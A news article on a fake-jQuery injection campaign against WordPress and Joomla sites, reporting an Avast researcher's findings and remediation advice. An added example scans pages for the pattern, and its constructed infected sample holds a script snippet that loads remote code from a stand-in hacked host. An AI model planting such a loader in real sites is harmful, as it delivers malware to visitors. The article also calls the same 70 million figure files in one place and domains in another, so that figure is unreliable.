Hackers are using the popular jQuery library to inject malicious code into websites powered by WordPress and Joomla. It’s a fairly widespread issue: Since November 2015, Avast has registered more than 4.5 million users who encountered the infection.
Malicious code was found in almost 70 million unique files on hacked websites.
According to Avast researcher Alexej Savcin, fake jQuery injections have been very popular among hackers because jQuery itself is popular.
“JQuery is a very popular JavaScript library,” he explained in a blog. “The basic aim of this library is to erase the differences between implementations of JavaScript in various web browsers. If you have ever tried web coding, you know how tedious it can be to make the code do the same thing in different browsers. Sometimes it is a really big challenge. In such situations, this library can be very useful.”
Perhaps it was only a matter of time until such a well-known library got the attention of those who want to use it for purposes other than web coding, but Savcin said that one of the most popular infections of the last couple of months is an attack that injects a fake jQuery script into the head section of CMS websites powered by WordPress and Joomla.
The script is a bit stealthy—the researcher noted that it’s located in such a way that normal visitors wouldn’t notice anything amiss unless they look into source code.
Once the code is examined, “at first glance you see simple code that is not obfuscated,” he said. “There are only a few variables and one IF statement which inserts another JavaScript source. The only thing that is changing is ‘var base =’, which points to another hacked website that serves as a source of injected malicious script.”
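For webmasters checking their own pages, the shape Savcin describes (an unobfuscated inline script in the head with a `var base =` assignment and an IF statement that inserts another script) can be matched heuristically. The following is an added example, not code from Avast or from the original article; the function names, the matching rules and the sample markup are assumptions constructed for illustration.

```javascript
// Added example: heuristics are assumptions drawn from the article's description,
// not Avast's detection logic. All sample markup below is constructed.
function hostOf(value) {
  try {
    return new URL(value.replace(/^\/\//, 'http://')).hostname;
  } catch {
    return null; // relative path or not a URL
  }
}

function findSuspiciousHeadScripts(html, siteHost) {
  const head = (html.match(/<head\b[^>]*>([\s\S]*?)<\/head>/i) || [])[1] || '';
  // Inline scripts only: <script> tags that carry no src attribute.
  const inlineScript = /<script\b(?![^>]*\bsrc\s*=)[^>]*>([\s\S]*?)<\/script>/gi;
  const findings = [];
  for (const m of head.matchAll(inlineScript)) {
    const body = m[1];
    const base = body.match(/\bvar\s+base\s*=\s*["']([^"']+)["']/);
    if (!base) continue;
    const hasIf = /\bif\s*\(/.test(body);
    const insertsScript =
      /createElement\(\s*["']script["']\s*\)/i.test(body) ||
      /document\.write\s*\([^)]*<script/i.test(body);
    const baseHost = hostOf(base[1]);
    // Flag only when `base` points at a host other than the site itself.
    if (hasIf && insertsScript && baseHost && baseHost !== siteHost.toLowerCase()) {
      findings.push({ baseHost, preview: body.trim().slice(0, 60) });
    }
  }
  return findings;
}

// Constructed page carrying the pattern; hosts are placeholders.
const INFECTED = `<html><head><title>Blog</title>
<script src="/wp-includes/js/jquery/jquery.js"></script>
<script>
var base = "http://hacked-site.example/";
var loaded = false;
if (!loaded) { var s = document.createElement("script"); s.src = base + "placeholder.js"; document.head.appendChild(s); }
</script>
</head><body>Hello</body></html>`;

// Constructed clean page: same variable name, but no remote host and no script insertion.
const CLEAN = `<html><head><script src="/js/jquery.js"></script>
<script>var base = "/"; if (window.jQuery) { jQuery.noConflict(); }</script>
</head><body>Hello</body></html>`;

console.log(findSuspiciousHeadScripts(INFECTED, 'myblog.example'));
console.log(findSuspiciousHeadScripts(CLEAN, 'myblog.example'));
```

A hit is a reason to inspect the template or database entry that produced the page, not proof of compromise; legitimate loaders can match the same shape.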
The number of hacked domains (70 million) that are used as a source for malicious JS code is abnormally high, which is why this kind of attack was and still is very popular on a daily basis.
To remediate the issue, Savcin recommends starting with the basics: “Reset your password. If it doesn't help, you can leverage tools like phpMyAdmin and Adminer to log into your database directly, bypassing your Admin login page and resetting your user in the users table,” he advised. Once in, the site’s database and files should be restored from a backup version. Once clean, webmasters shouldn’t forget to update their installations; older versions are naturally more prone to hacks than newer versions.